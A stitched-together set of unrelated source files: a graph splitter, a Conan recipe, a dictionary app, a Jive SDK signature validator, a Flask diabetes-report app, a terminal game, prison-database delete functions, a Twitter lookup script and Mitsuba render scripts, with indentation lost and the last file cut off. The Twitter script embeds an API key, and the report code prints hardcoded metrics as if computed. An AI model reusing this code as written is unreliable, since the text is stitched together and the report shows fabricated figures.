def open_files(args):
os.mkdir(args.directory)
os.chdir(args.directory)
files = []
for i in range(args.num_processors):
filename = args.basename + '-' + str(i) + '.adj'
print 'Opening file', filename
f = open(filename, mode='w')
files.append(f)
return files
def close_files(files):
for f in files:
print 'Closing file', f.name
f.close()
def get_processor_id(node_id, num_processors):
return int(node_id) % num_processors
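# Nodes are assigned round-robin by id: with 4 processors, node ids 0..7 map to
# files 0, 1, 2, 3, 0, 1, 2, 3 respectively.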
def split_graph(args):
files = open_files(args)
num_processors = args.num_processors
for line in sys.stdin:
node_id = line.split('|')[0]
processor_id = get_processor_id(node_id, num_processors)
files[processor_id].write(line)
close_files(files)
def main():
argParser = argparse.ArgumentParser(description='Splits a graph file.')
argParser.add_argument('-b', '--basename', dest='basename',
default='graph', metavar='NAME',
help='The base name of the output files.')
argParser.add_argument('-n', metavar='N', dest='num_processors',
default=1, type=int,
help='The number of processors, defaults to one.')
argParser.add_argument('-d', '--dir', dest='directory',
default='.', metavar='DIR',
help=
'The directory where output files will be placed in')
args = argParser.parse_args()
split_graph(args)
if __name__ == '__main__':
main()
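# Example invocation (hypothetical names): shard an adjacency file produced by
# pair2adjacency.py across 4 workers into ./parts/graph-0.adj ... graph-3.adj:
#
#   cat graph.adj | python splitInput.py -n 4 -b graph -d parts
#
# A line whose node id is 10 goes to graph-2.adj, since 10 % 4 == 2.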
``` |
{
"source": "jiverson002/GKlib-conan",
"score": 2
} |
#### File: jiverson002/GKlib-conan/conanfile.py
```python
from conans import ConanFile, CMake, tools
class GKlibConan(ConanFile):
name = "GKlib"
version = "0.0.1"
license = "MIT"
author = "<NAME> (<EMAIL>)"
url = "https://github.com/jiverson002/GKlib"
homepage = "https://github.com/jiverson002/GKlib"
description = "A library of various helper routines and frameworks used by many of the lab's software."
topics = ("utilities")
settings = "os", "compiler", "build_type", "arch"
options = {
"shared": [True, False],
"fPIC": [True, False],
"visibility": ["hidden", "default"],
"apps": [True, False]
}
default_options = {
"shared": False,
"fPIC": True,
"visibility": "default", # FIXME: hidden causes build to fail
"apps": True
}
exports = ["LICENSE"]
scm = {
"type": "git",
"url": "https://github.com/jiverson002/GKlib.git",
"revision": "feature/modern-cmake-pr"
}
def build(self):
cmake = CMake(self)
cmake.definitions["CMAKE_WINDOWS_EXPORT_ALL_SYMBOLS"] = True
cmake.definitions["CMAKE_C_VISIBILITY_PRESET"] = self.options.visibility
cmake.definitions["GKLIB_BUILD_APPS"] = self.options.apps
#cmake.verbose = True
cmake.configure()
cmake.build()
#cmake.test()
cmake.install()
def package(self):
self.copy("*.h", dst="include/GKlib", src="include")
self.copy("*GKlib.lib", dst="lib", keep_path=False)
self.copy("*.dll", dst="bin", keep_path=False)
self.copy("*.so", dst="lib", keep_path=False)
self.copy("*.dylib", dst="lib", keep_path=False)
self.copy("*.a", dst="lib", keep_path=False)
``` |
{
"source": "jiveshs98/Python-Dictionary",
"score": 4
} |
#### File: jiveshs98/Python-Dictionary/dictionary.py
```python
import json
from difflib import get_close_matches
data= json.load(open("data.json"))
def dictionary(key):
key= key.lower()
if key in data: # If word is present in dictionary
return data[key]
elif key.upper() in data: # If there is any acronym like USA, NATO, UN, IPC etc
return data[key.upper()]
elif key.title() in data: # If there is a word starting with a capital letter such as nouns: Delhi
return data[key.title()]
elif len(get_close_matches(key,data.keys()))>0: # If there is any possibility of a similar word
match= get_close_matches(key,data.keys())[0]
ch= input("\nDid you mean %s? Enter 'y' for yes and 'n' for no : " % match)
ch= ch.upper()
if ch == 'Y':
return data[match]
elif ch == 'N':
return "Sorry! This word doesn't exist. Please double check it.\n"
else:
return "Invalid response!!!\n"
else:
return "Sorry! This word doesn't exist. Please double check it.\n"
word= input("\nEnter a word: ")
meaning= dictionary(word)
print("\n")
if type(meaning) == list:
for i in meaning:
print("--> %s\n"%i)
else:
print(meaning)
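# The script expects data.json to map words to lists of definitions: ordinary
# words in lower case, acronyms in upper case and proper nouns in Title case,
# matching the lookups above. An illustrative (made-up) entry:
#
#   {"rain": ["Precipitation in the form of drops of water."],
#    "NATO": ["North Atlantic Treaty Organization."],
#    "Delhi": ["Capital territory of India."]}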
``` |
{
"source": "jivesoftware/jive-sdk-python-pip",
"score": 2
} |
#### File: jive-sdk-python-pip/jive_sdk/__init__.py
```python
import hmac
import hashlib
import base64
import urllib
import json
import requests
from collections import OrderedDict
import logging
import copy
#############################################
# is_valid_registration_notification
#############################################
def is_valid_registration_notification(payload, clientSecret=None):
"""
This method implements the Jive logic to validate if an add-on registration request originates from an authentic Jive instance.
Arguments:
1) payload (REQUIRED) - The JSON structure (not a string) Jive sends to the register_url and unregister_url defined in your add-on's meta.json
{
"clientId" : "xxxxx",
"tenantId" : "xxxxx",
"jiveSignatureURL" : "xxxxx",
"clientSecret" : "xxxxx",
"jiveSignature" : "xxxxx",
"jiveUrl" : "xxxxx",
"timestamp" : "2015-10-16T18:11:11.113+0000"
}
2) clientSecret (OPTIONAL) - In the event of an UNREGISTER event, Jive will NOT send the clientSecret again. To validate, you will need to provide the clientSecret with this argument.
Examples of calls to this method include:
jive_sdk.is_valid_registration_notification(your_json) - Used for Register Events
jive_sdk.is_valid_registration_notification(your_json, clientSecret="your_secret") - Used for UNregister Events
For more details, check out the Jive Developer Community
https://community.jivesoftware.com/docs/DOC-99941
https://community.jivesoftware.com/docs/DOC-156557
"""
# NEED THESE FOR LATER
jiveSignatureURL = payload['jiveSignatureURL']
jiveSignature = payload['jiveSignature']
# MAKING A COPY
data_json = copy.deepcopy(payload)
# REMOVE JIVE SIGNATURE FROM PAYLOAD
data_json.pop('jiveSignature')
# IS THERE AN EXISTING clientSecret OUTSIDE OF THE PAYLOAD
if not clientSecret:
# THEN WE ARE A REGISTER EVENT
if not data_json['clientSecret']:
logging.warn("Registration Event with no Secret, Invalid Payload")
return False
else:
data_json['clientSecret'] = hashlib.sha256(data_json['clientSecret']).hexdigest()
else:
if 'clientSecret' in payload:
logging.warn("Client Secret already in payload, ignoring argument. Make sure you are not passing in clientId on register events")
else:
data_json['clientSecret'] = clientSecret
# COMPILING THE BODY TO SEND TO THE MARKET TO VALIDATE
data = ''
for k,v in sorted(OrderedDict(data_json).items()):
data += k + ":" + v +"\n"
logging.debug("Signature Validation URL: [%s]", jiveSignatureURL)
logging.debug("Signature Data:\n%s", data)
res = requests.post(jiveSignatureURL, data=data, headers={ "X-Jive-MAC" : jiveSignature })
if res.status_code == 204:
logging.info("Validation Successful [%d]",res.status_code)
return True
logging.warn("Validation Failed [%d]", res.status_code)
return False
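# For reference, the body POSTed to jiveSignatureURL above is just the sorted
# "key:value" lines of the payload, with jiveSignature removed and clientSecret
# replaced by its SHA-256 hex digest on register events, e.g. (made-up values):
#
#   clientId:abc123
#   clientSecret:9f86d081884c7d65...
#   jiveSignatureURL:https://market.example/validation
#   jiveUrl:https://example.jiveon.com
#   tenantId:tenant-1
#   timestamp:2015-10-16T18:11:11.113+0000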
#############################################
# is_valid_authorization
#############################################
def is_valid_authorization(authorization, clientId, clientSecret):
"""
This method implements the Jive logic to validate a signed-fetch request from the OpenSocial container in Jive request.
Arguments:
1) authorization (REQUIRED) - the value of the "Authorization" header on the request
2) clientId (REQUIRED) - the shared clientId for the add-on
3) clientSecret (REQUIRED) - the clientSecret for the add-on
Examples of calls to this method include:
jive_sdk.is_valid_authorization(your_authorization_header,your_clientId,your_clientSecret)
For more details, check out the Jive Developer Community
https://community.jivesoftware.com/docs/DOC-99941
https://community.jivesoftware.com/docs/DOC-156557
https://community.jivesoftware.com/docs/DOC-163586
"""
if not authorization:
logging.warn("Invalid Authorization (null/empty)")
return False
fields = authorization.split(' ')
if fields[0] != "JiveEXTN":
logging.warn("Invalid Authorization Type [%s]",fields[0])
return False
if not fields[1]:
logging.warn("Invalid Parameters [None]")
return False
flag = fields[0]
message = ''
signature = ''
for kv in fields[1].split('&'):
key, value = kv.split("=")
if (key == "client_id" and value != clientId):
logging.warn("ClientId [%s] did not match expected ClientId [%s]",key,clientId)
return False
elif key == "signature":
signature = urllib.unquote(value).decode()
else:
message += "&" + key + "=" + value
message = message[1:]
# REMOVING SUFFIX FOR PROPER BASE64 DECODE
if clientSecret.endswith(".s"):
clientSecret = clientSecret[:-2]
# PROCESSING EXPECTING SIGNATURE
secret = base64.b64decode(clientSecret)
dig = hmac.new(secret, msg=message, digestmod=hashlib.sha256).digest()
expectedSignature = base64.b64encode(dig).decode();
expectedSignature = urllib.unquote(expectedSignature).decode()
# DO THE FINAL SIGNATURE COMPARISON
if signature != expectedSignature:
logging.warn("Signatures did NOT match! [expected: %s] [actual: %s]",expectedSignature, signature)
return False
return True
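# The Authorization header this validates looks roughly like the following
# (parameter names other than client_id and signature, and all values, are
# illustrative):
#
#   JiveEXTN algorithm=HmacSHA256&client_id=abc123&jive_url=https%3A%2F%2Fexample.jiveon.com&tenant_id=t1&timestamp=1444500000000&signature=BASE64SIG
#
# All parameters except signature are concatenated back together and re-signed
# with the (base64-decoded) client secret; the result must match the signature Jive sent.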
``` |
{
"source": "Jivi2478/SNF",
"score": 2
} |
#### File: Jivi2478/SNF/app.py
```python
from flask import Flask, render_template, request,redirect
from flask import send_file, send_from_directory, safe_join, abort
from flask.helpers import url_for
from generate_report import *
import os
print(os.getcwd())
from sklearn.model_selection import train_test_split
#----------------------------------------------------------------------------#
# App Config.
#----------------------------------------------------------------------------#
app = Flask(__name__)
app.config.from_object('config')
#db = SQLAlchemy(app)
# Automatically tear down SQLAlchemy.
'''
@app.teardown_request
def shutdown_session(exception=None):
db_session.remove()
'''
# Login required decorator.
'''
def login_required(test):
@wraps(test)
def wrap(*args, **kwargs):
if 'logged_in' in session:
return test(*args, **kwargs)
else:
flash('You need to login first.')
return redirect(url_for('login'))
return wrap
'''
#----------------------------------------------------------------------------#
# Controllers.
#----------------------------------------------------------------------------#
@app.route('/',methods=['GET','POST'])
def home():
return render_template('pages/SNF.html')
@app.route('/download', methods=['GET', 'POST'])
def download():
global user_details
if(request.method == 'POST'):
print("Test")
user_details= {
"Name":request.form.get("name"),
"Gender":request.form.get("gender"),
"Age":request.form.get("age"),
"Pregnancies":request.form.get("pregnancies"),
"Glucose":request.form.get("glucose"),
"Bloodpressure":request.form.get("bloodpressure"),
"Skinthickness":request.form.get("skinthickness"),
"Insulin":request.form.get("insulin"),
"BMI":request.form.get('bmi'),
"Diabetes Pedigree Function":request.form.get('dpf'),
"Email Address":request.form.get('email')
#"Gender":request.form.get("gender"),
#"Diagnosis":request.form.get("Diagnosis"),
#"Analysis":request.form.get("disease"),
#"Image":""
}
print(user_details)
report = Report()
report.generate_report(user_details) #Added change here
return redirect('/')
return redirect('/')
#return send_from_directory(directory="./reports", filename="report.pdf")
#IMAGE INPUT
#@<EMAIL>("/analyze_img",methods=['POST','GET'])
#def analyze_img():
#if(request.method == 'POST'):
#if(request.files):
#report.refresh()
#img = request.files['image']
#img.save(os.path.join("./static/images",img.filename))
#user_details['Image'] = img.filename
#print(user_details)
#report.generate_report(user_details)
#test_img = cv2.imread(os.path.join(app.config['IMAGE_UPLOADS'], img.filename))
#return redirect('user')
@app.route('/about')
def about():
return render_template('pages/placeholder.about.html')
# @app.route('/login')
# def login():
# form = LoginForm(request.form)
# return render_template('forms/login.html', form=form)
# @app.route('/register')
# def register():
# form = RegisterForm(request.form)
# return render_template('forms/register.html', form=form)
# @app.route('/forgot')
# def forgot():
# form = ForgotForm(request.form)
# return render_template('forms/forgot.html', form=form)
# Error handlers.
# @app.errorhandler(500)
# def internal_error(error):
# #db_session.rollback()
# return render_template('errors/500.html'), 500
# @app.errorhandler(404)
# def not_found_error(error):
# return render_template('errors/404.html'), 404
# if not app.debug:
# file_handler = FileHandler('error.log')
# file_handler.setFormatter(
# Formatter('%(asctime)s %(levelname)s: %(message)s [in %(pathname)s:%(lineno)d]')
# )
# app.logger.setLevel(logging.INFO)
# file_handler.setLevel(logging.INFO)
# app.logger.addHandler(file_handler)
# app.logger.info('errors')
#----------------------------------------------------------------------------#
# Launch.
#----------------------------------------------------------------------------#
# Default port - PORT:3000:
if __name__ == '__main__':
app.run()
```
#### File: Jivi2478/SNF/generate_report.py
```python
from fpdf import FPDF
import pandas as pd
import os
import joblib
from sklearn.metrics import accuracy_score
from sklearn import metrics
from sklearn.metrics import confusion_matrix
from sklearn.metrics import classification_report
from sklearn.model_selection import train_test_split
from sklearn.preprocessing import StandardScaler
from sklearn.neighbors import KNeighborsClassifier
class SNF_Detect:
# Directories for Model --> Change if subdirectories created
CURR_DIR = os.getcwd()
model_dir = "./Model/savedmodel.pkl"
def __init__(self):
self.clf = joblib.load(self.model_dir)
def predict(self):
df=pd.read_csv('./Model/content/diabetes.csv')
X=df.drop('Outcome',axis=1)
y=df['Outcome']
X_train, X_test, y_train, y_test = train_test_split(X, y,test_size=0.2,random_state=0)
sc_x=StandardScaler()
X_train=sc_x.fit_transform(X_train)
X_test=sc_x.transform(X_test)
knn=KNeighborsClassifier(n_neighbors=5,metric='euclidean',p=2)
knn.fit(X_train,y_train)
target_names = ['Diabetes', 'Normal']
y_pred = knn.predict(X_test)
return(classification_report(y_test, y_pred, target_names=target_names,output_dict=True))
def save_model(self):
print("Saving the model")
return
class Report:
# Creating pdf object
pdf = None
# inx declaration
inx = 60
def __init__(self):
# format ('A3','A4','Letter','Legal')
self.pdf = FPDF('P','mm','A4')
# Adding a page to the pdf file
self.pdf.add_page()
# Setting up font
self.pdf.set_font('helvetica','',16)
def header(self):
# Arial bold 15
self.pdf.set_font('Arial', 'B', 15)
# Move to the right
self.pdf.cell(46)
# Title
self.pdf.cell(90, 20, 'MEDICAL REPORT', 1, 0, 'C')
# Logo
self.pdf.image('./static/images/dl.jpg', 170, 4, 33)
self.pdf.line(0, 40,220,40)
# Line break
self.pdf.ln(20)
def insert_text(self,user_details):
# Add Text
# w = width
# h = height
# Adding Title
# for key,value
inx = self.inx
for key,value in user_details.items():
self.pdf.cell(0,inx,key + " : " + value)
self.pdf.ln(2)
inx+=5
self.pdf.ln(1)
inx+=5
self.inx = inx
def generate_report(self,user_details):
# print(os.getcwd())
self.header()
model = SNF_Detect()
classification_report = model.predict()
print(classification_report)
# Setting up Personal Details header
self.pdf.cell(90,self.inx,"PERSONAL DETAILS")
self.pdf.ln(10)
self.insert_text(
{
"Name":user_details["Name"],
"Gender":user_details["Gender"],
"Age":user_details["Age"],
"Pregnancies":user_details["Pregnancies"],
"Glucose":user_details["Glucose"],
"Blood Pressure":user_details["Bloodpressure"],
"Skin Thickness":user_details["Skinthickness"],
"Insulin":user_details["Insulin"],
"BMI":user_details["BMI"],
"Diabetes Pedigree Function":user_details["Diabetes Pedigree Function"],
"Email ID":user_details["Email Address"]
}
)
self.pdf.cell(0,self.inx,"ANALYSIS")
self.pdf.line(0,120,220,120)#Horizontal Line
self.pdf.ln(10)#Horizontal space
#{'Diabetes': {'precision': 0.8454545454545455, 'recall': 0.8691588785046729, 'f1-score': 0.8571428571428571, 'support': 107}, 'Normal': {'precision': 0.6818181818181818, 'recall': 0.6382978723404256, 'f1-score': 0.6593406593406593, 'support': 47}, 'accuracy': 0.7987012987012987, 'macro avg': {'precision': 0.7636363636363637, 'recall': 0.7537283754225492, 'f1-score': 0.7582417582417582, 'support': 154}, 'weighted avg': {'precision': 0.7955135773317591, 'recall': 0.7987012987012987, 'f1-score': 0.796774653917511, 'support': 154}}
self.pdf.cell(0,self.inx,"DIABETES")
self.pdf.ln(4)#2
self.inx += 5
self.insert_text(
{
"precision":" 0.8454545454545455",
"recall":" 0.8691588785046729",
"f1-score":"0.8571428571428571",
"support": "107"
}
)
#self.pdf.line(0,200,220,200) SELF NORMAL COMES IN NEXT LINE
self.pdf.cell(0,self.inx,"NORMAL")
self.pdf.ln(3)
self.inx += 5
self.insert_text(
{
"precision":"0.6818181818181818",
"recall":" 0.6382978723404256",
"f1-score":"0.6593406593406593",
"support": "47"
}
)
self.pdf.ln(16)
self.pdf.output('./report.pdf')
def refresh(self):
# format ('A3','A4','Letter','Legal')
self.pdf = FPDF('P','mm','A4')
# Adding a page to the pdf file
self.pdf.add_page()
# Setting up font
self.pdf.set_font('helvetica','',16)
# if __name__ == '__main__':
# report = Report()
# report.generate_report()
``` |
{
"source": "jivid/plexmonitor",
"score": 3
} |
#### File: plexmonitor/plexmonitor/handlers.py
```python
from functools import wraps
from typing import Callable, Any, Dict, Union
from plexmonitor.lib.command import Command
# TODO(divij): I can't yet figure out what the return type of handler functions
# should be, so just use Any for now
HandlerFuncType = Callable[[Command], Any]
__all__ = ['get_handler_for_action']
_registry = {} # type: Dict[str, HandlerFuncType]
def get_handler_for_action(action: str) -> Union[HandlerFuncType, None]:
""" Get a handler from the registry
"""
return _registry.get(action)
def handles(action: str) -> Callable[[HandlerFuncType], Any]:
""" Simple decorator to add a function to the handler registry. It takes as
an argument the action the function handles.
If many functions handle the same action, only the first is registered
"""
def wrapper(func: HandlerFuncType):
@wraps(func)
def wrapped_func(command: Command):
if not isinstance(command, Command):
raise RuntimeError("{} is not an instance of Command"
.format(command))
return func(command)
# Register just the first function and ensure that the wrapped
# function is registered, not the raw one
if action not in _registry:
_registry[action] = wrapped_func
return wrapped_func
return wrapper
@handles('status')
def get_system_status(cmd):
print("Checking system status")
```
#### File: plexmonitor/tasks/email_task.py
```python
import email
from sparts.tasks.periodic import PeriodicTask # type: ignore
from plexmonitor.lib.command import Command
from plexmonitor.lib.email import Inbox
class EmailTask(PeriodicTask):
""" Periodic task to read the email inbox and scan for new commands.
To prevent against potential DOS, the task will only look at one email
per iteration, the most recent one. If the most recent mail has already
been processed, the iteration will be a no-op.
"""
INTERVAL = 10.0
def initTask(self) -> None:
super(EmailTask, self).initTask()
self.inbox = Inbox()
self.inbox.connect()
self.last_mail_id = None # type: str
def execute(self) -> None:
last_unread = self.inbox.get_last_unread_mail_id()
last_processed = self.last_mail_id
if last_processed is not None and\
int(last_unread) <= int(last_processed):
self.logger.info("Nothing to fetch")
return
self.logger.info("Going to fetch mail ID {}".format(last_unread))
mail = self.inbox.fetch(last_unread) # type: email.message.Message
self.last_mail_id = last_unread
cmd = Command.from_email(mail)
if not cmd:
self.logger.info("No valid command")
return
self.logger.info("Got command {action} from {sender}"
.format(action=cmd.action,
sender=cmd.context['sender']))
``` |
{
"source": "jiviteshjain/cast-away",
"score": 3
} |
#### File: jiviteshjain/cast-away/mandalorian.py
```python
import os
import numpy as np
from colorama import init as cinit
from colorama import Fore, Back, Style
import random
from time import monotonic as clock
import config as conf
from thing import Thing
class Mandalorian(Thing):
def __init__(self, game_height, game_width, y=0):
super().__init__(game_height, game_width, np.array([game_height - conf.GND_HEIGHT - 4, y]), np.array([4, 3]))
self._acc = np.array([conf.GRAVITY_X, conf.GRAVITY_Y])
self._repr = np.array([
[' ', Fore.CYAN + Style.BRIGHT + '_', ' '],
[Fore.CYAN + Style.BRIGHT + '|', Fore.GREEN +
Style.BRIGHT + 'O', Fore.CYAN + Style.BRIGHT + '`'],
[Fore.CYAN + Style.BRIGHT + '[', Style.BRIGHT + Back.GREEN + ' ', Fore.CYAN + Style.BRIGHT + ']'],
[' ', Fore.CYAN + Style.BRIGHT + 'J', Fore.CYAN + Style.BRIGHT + 'L']
], dtype='object')
self._repr_shield = np.array([
[' ', Fore.CYAN + Style.BRIGHT + '_', ' '],
[Fore.CYAN + Style.BRIGHT + '|', Fore.GREEN +
Style.BRIGHT + 'O', Fore.CYAN + Style.BRIGHT + '`'],
[Fore.CYAN + Style.BRIGHT + '[', Style.BRIGHT +
Back.BLACK + ' ', Fore.CYAN + Style.BRIGHT + ']'],
[' ', Fore.CYAN + Style.BRIGHT + 'J', Fore.CYAN + Style.BRIGHT + 'L']
], dtype='object')
self._shield = False
def is_out(self):
'''
        overridden to flag each side (top, left, bottom, right) as soon as any part of the object goes off screen, because the Mandalorian cannot be allowed to go off screen
'''
# T, L, B, R
return (self._pos[0] < 0), (self._pos[1] < 0), (self._pos[0] + self._size[0] - 1 >= self._game_h), (self._pos[1] + self._size[1] - 1 >= self._game_w)
def show(self):
'''
        overridden to accommodate the shield
'''
if not self._shield:
return np.round(self._pos).astype(np.int32), self._size, self._repr
else:
return np.round(self._pos).astype(np.int32), self._size, self._repr_shield
def set_shield(self, what):
if type(what) != bool:
raise ValueError
self._shield = what
def nudge(self, key):
if key == 'w':
self._acc[0] -= conf.KEY_FORCE
elif key == 'a':
self._acc[1] -= conf.KEY_FORCE
elif key == 'd':
self._acc[1] += conf.KEY_FORCE
def reset_acc(self):
'''
        overridden to accommodate gravity and drag force
'''
super().reset_acc()
self._acc[0] += conf.GRAVITY_X
self._acc[1] += conf.GRAVITY_Y
# drag force added so that velocity changes due to user inputs do not accumulate
# drag force tends to align the player's velocities to the game's velocity
if (self._vel[1] + conf.GAME_SPEED) > 0:
drag = -conf.DRAG_COEFF * ((self._vel[1] + conf.GAME_SPEED)** 2)
else:
drag = conf.DRAG_COEFF * ((self._vel[1] + conf.GAME_SPEED)** 2)
self._acc[1] += drag
def move(self):
super().move()
t, l, b, r = self.is_out() # don't let it go out
if l:
if self._vel[1] < 0:
self._pos[1] = 0
self._vel[1] = 0
if self._acc[1] < 0:
self._acc[1] = 0
if r:
if self._vel[1] > 0:
self._pos[1] = self._game_w - self._size[1]
self._vel[1] = 0
if self._acc[1] > 0:
self._acc[1] = 0
``` |
{
"source": "jiviteshjain/da-phase-4",
"score": 4
} |
#### File: jiviteshjain/da-phase-4/delete.py
```python
def delete_prisoner(cur, con):
try:
print("Enter ID of prisoner you want to delete")
id = int(input())
query = "delete from Prisoners where id = %d ;" % (id)
cur.execute(query)
con.commit()
print("Deleted prisoner")
input("Press any key to continue")
except Exception as e:
con.rollback()
print("Failed to delete from database")
print(">>>>>>>>>>>>>", e)
input("Press any key to continue")
return
def delete_job(cur, con):
try:
print("Enter ID of job you want to delete")
id = int(input())
query = "delete from Jobs where id = %d ; " % (id)
cur.execute(query)
con.commit()
print("Deleted job")
input("Press any key to continue")
except Exception as e:
con.rollback()
print("Failed to delete from database")
print(">>>>>>>>>>>>>", e)
input("Press any key to continue")
return
def delete_staff(cur, con):
try:
print("Enter ID of the staff member you want to delete")
id = int(input())
query = "delete from Prison_Staff where id = %d ; " % (id)
cur.execute(query)
con.commit()
print("Deleted staff member")
input("Press any key to continue")
except Exception as e:
con.rollback()
print("Failed to delete from database")
print(">>>>>>>>>>>>>", e)
input("Press any key to continue")
return
def delete_offence(cur, con):
try:
print("Enter ID of the offence you want to delete")
id = int(input())
query = "delete from Offences where id = %d ; " % (id)
cur.execute(query)
con.commit()
print("Deleted offence")
input("Press any key to continue")
except Exception as e:
con.rollback()
print("Failed to delete from database")
print(">>>>>>>>>>>>>", e)
input("Press any key to continue")
return
def delete_appeal(cur, con):
try:
print("Enter ID of the appeal you want to delete")
id = int(input())
query = "delete from Appeals where id = %d ; " % (id)
cur.execute(query)
con.commit()
print("Deleted appeal")
input("Press any key to continue")
except Exception as e:
con.rollback()
print("Failed to delete from database")
print(">>>>>>>>>>>>>", e)
input("Press any key to continue")
return
``` |
{
"source": "jiviteshjain/github-slideshow",
"score": 3
} |
#### File: jiviteshjain/github-slideshow/journalists_twitter.py
```python
import json
import tweepy
from pprint import pprint
import tqdm
# %%
CONSUMER_KEY = "SL5KvNaqmVjJ4XsibIpLxLYLu"
CONSUMER_KEY_SECRET = "<KEY>"
ACCESS_TOKEN = "<KEY>"
ACCESS_TOKEN_SECRET = "<KEY>"
# %%
auth = tweepy.OAuthHandler(CONSUMER_KEY, CONSUMER_KEY_SECRET)
api = tweepy.API(auth, wait_on_rate_limit=True, wait_on_rate_limit_notify=True)
redirect_url = auth.get_authorization_url()
print(redirect_url)
# %%
auth.get_access_token('0<PASSWORD>')
# %%
with open('journalists.json', 'r') as f:
koo_users = json.load(f)
# %%
def search_user(name):
res = api.search_users(q=name, tweet_mode='extended')
if len(res) == 0:
return None
return res[0]
# %%
class User:
def __init__(self, koo_user, twitter_user):
self.koo_user = koo_user
self.twitter_user = twitter_user
def print(self):
if self.twitter_user is None:
return f"{self.koo_user['name']}\t{self.koo_user['userHandle']}\t\t\t{self.koo_user['followerCount']}\t{self.koo_user['badgeType']}\n"
else:
return f"{self.koo_user['name']}\t{self.koo_user['userHandle']}\t{self.twitter_user.name}\t{self.twitter_user.screen_name}\t{self.koo_user['followerCount']}\t{self.koo_user['badgeType']}\n"
@classmethod
def schema(cls):
return "Koo Name\tKoo Handle\tTwitter Name\tTwitter Handle\t# Followers on Koo\tVerified on Koo\n"
# %%
users = []
# %%
for koo_user in tqdm.tqdm(koo_users):
twitter_user = search_user(koo_user['name'])
users.append(User(koo_user, twitter_user))
# %%
with open('journalists_twitter.json', 'w') as f:
json.dump([u.twitter_user._json if u.twitter_user else None for u in users], f)
# %%
with open('journalists.tsv', 'w') as f:
f.write(User.schema())
for user in users:
f.write(user.print())
# %%
``` |
{
"source": "jiviteshjain/render-mitsuba",
"score": 3
} |
#### File: jiviteshjain/render-mitsuba/copy_files.py
```python
import shutil
import argparse
import os
parser = argparse.ArgumentParser()
parser.add_argument('--path', type=str, required=True)
parser.add_argument('--start', type=int, default=0, required=False)
parser.add_argument('--end', type=int, required=True)
parser.add_argument('--stops', type=int, default=3)
args = parser.parse_args()
class PathManager:
def __init__(self, path):
self.dirname = os.path.dirname(path)
basename = os.path.basename(path)
self.filename, self.ext = os.path.splitext(basename)
print(self.dirname, basename, self.filename, self.ext)
def get(self, num):
return os.path.join(self.dirname, f'{self.filename}{str(num).zfill(3)}{self.ext}')
paths = PathManager(args.path)
num = args.end + 1
for _ in range(args.stops):
shutil.copy2(paths.get(args.end), paths.get(num))
num += 1
for i in range(args.end, args.start + 1, -1):
shutil.copy2(paths.get(i), paths.get(num))
num += 1
for _ in range(args.stops):
shutil.copy2(paths.get(args.start), paths.get(num))
num += 1
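# Example (hypothetical paths): with --path renders/frame.png --start 0 --end 4
# --stops 2, the script appends frame005.png ... frame011.png as copies of
# frames 4, 4, 4, 3, 2, 0, 0 -- a hold on the last frame, the sequence played
# back in reverse, and a hold on the first frame, i.e. a ping-pong loop for video.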
```
#### File: jiviteshjain/render-mitsuba/render_video.py
```python
from render_for_video import Renderer
from argparse import ArgumentParser
import os
import re
import time
import numpy as np
#1,1,0.9 0.5,1.5,4.5
#1,1,1.5 0.7,1,4.5
#-0.1,-0.1,2.4 1,1,2
#0.9,0.9,2
# 1.5,1.5,2.7
XML_HEAD = """
<scene version="0.6.0">
<integrator type="path">
<integer name="maxDepth" value="-1"/>
</integrator>
<sensor type="perspective">
<float name="farClip" value="100"/>
<float name="nearClip" value="0.1"/>
<transform name="toWorld">
<lookat origin="1.4,1.4,2.5" target="0,0,0" up="0,0,1"/>
</transform>
<float name="fov" value="25"/>
<sampler type="ldsampler">
<integer name="sampleCount" value="1024"/>
</sampler>
<film type="hdrfilm">
<integer name="width" value="1920"/>
<integer name="height" value="1080"/>
<rfilter type="gaussian"/>
</film>
</sensor>
<bsdf type="roughplastic" id="surfaceMaterial">
<string name="distribution" value="ggx"/>
<float name="alpha" value="0.05"/>
<float name="intIOR" value="1.46"/>
<rgb name="diffuseReflectance" value="1,1,1"/> <!-- default 0.5 -->
</bsdf>
<bsdf type="plastic" id="surfaceMaterial2">
<float name="intIOR" value="1.46"/>
<rgb name="diffuseReflectance" value="1,1,1"/> <!-- default 0.5 -->
</bsdf>
"""
XML_TAIL = """
<shape type="rectangle">
<ref name="bsdf" id="surfaceMaterial"/>
<transform name="toWorld">
<scale x="10" y="10" z="1"/>
<lookat origin="0,0,-0.1" target="-2.5,-2.5,10" up="0,0,1"/>
</transform>
</shape>
<shape type="sphere">
<float name="radius" value="1.6"/>
<transform name="toWorld">
<translate x="0" y="0" z="5"/>
</transform>
<emitter type="area">
<rgb name="radiance" value="11,11,11"/>
</emitter>
</shape>
<emitter type="constant">
<rgb name="radiance" value="0.18,0.18,0.18"/>
</emitter>
</scene>
"""
XML_SPHERE = """
<shape type="sphere">
<float name="radius" value="{radius}"/>
<transform name="toWorld">
<translate x="{x}" y="{y}" z="{z}"/>
</transform>
<bsdf type="diffuse">
<rgb name="reflectance" value="{r},{g},{b}"/>
</bsdf>
</shape>
"""
ROW_DIR = np.array([-3, 3, 0], dtype=np.float32)
ROW_DIR /= np.linalg.norm(ROW_DIR)
COL_DIR = np.array([3, 3, -1.5], dtype=np.float32)
COL_DIR /= np.linalg.norm(COL_DIR)
ROT_DIR = np.cross(ROW_DIR, COL_DIR)
ROW_DIR = ROW_DIR[(1, 2, 0), ]
ROW_DIR[0] *= -1
ROT_DIR = ROT_DIR[(1, 2, 0), ]
ROT_DIR[0] *= -1
COL_DIR = COL_DIR[(1, 2, 0), ]
COL_DIR[0] *= -1
print(ROW_DIR, COL_DIR)
Rs = []
Ss = [
"""
<!DOCTYPE ViewState>
<project>
<VCGCamera FocalMm="32.833435" TranslationVector="0.664746 -2.25634 -0.372164 1" ViewportPx="1577 1027" CenterPx="788 513" CameraType="0" BinaryData="0" LensDistortion="0 0" PixelSizeMm="0.0369161 0.0369161" RotationMatrix="0.727616 0.0788547 0.681437 0 0.643869 0.264198 -0.718076 0 -0.236658 0.96124 0.141462 0 0 0 0 1 "/>
<ViewSettings NearPlane="0.30310887" FarPlane="7.4027324" TrackScale="1.245262"/>
</project>
""",
"""
<!DOCTYPE ViewState>
<project>
<VCGCamera BinaryData="0" CameraType="0" ViewportPx="1577 1027" PixelSizeMm="0.0369161 0.0369161" LensDistortion="0 0" RotationMatrix="-0.275013 0.772173 0.572815 0 -0.95127 -0.304969 -0.0456044 0 0.139476 -0.557444 0.818415 0 0 0 0 1 " FocalMm="32.833454" TranslationVector="-0.49805 1.43134 -2.11628 1" CenterPx="788 513"/>
